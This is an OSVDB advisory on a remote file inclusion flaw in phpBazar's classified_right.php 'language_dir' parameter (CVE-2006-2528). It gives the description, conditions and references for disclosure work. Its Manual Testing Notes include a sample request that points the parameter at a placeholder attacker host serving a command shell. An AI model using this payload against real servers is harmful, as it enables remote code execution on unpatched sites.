phpBazar classified_right.php language_dir Variable Remote File Inclusion

2006-05-20T12:32:33
ID OSVDB:25700
Type osvdb
Reporter PHP Emperor(6d@hotmail.com)
Modified 2006-05-20T12:32:33

Description

Vulnerability Description

phpBazar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to classified_right.php not properly sanitizing user input supplied to the 'language_dir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

phpBazar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to classified_right.php not properly sanitizing user input supplied to the 'language_dir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

/classified_right.php?language_dir=http://[attacker]/cmd.gif?cmd=ls

References:

Vendor URL: http://www.smartisoft.com/ Secunia Advisory ID:20198 Related OSVDB ID: 25701 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0390.html FrSIRT Advisory: ADV-2006-1890 CVE-2006-2528 Bugtraq ID: 18052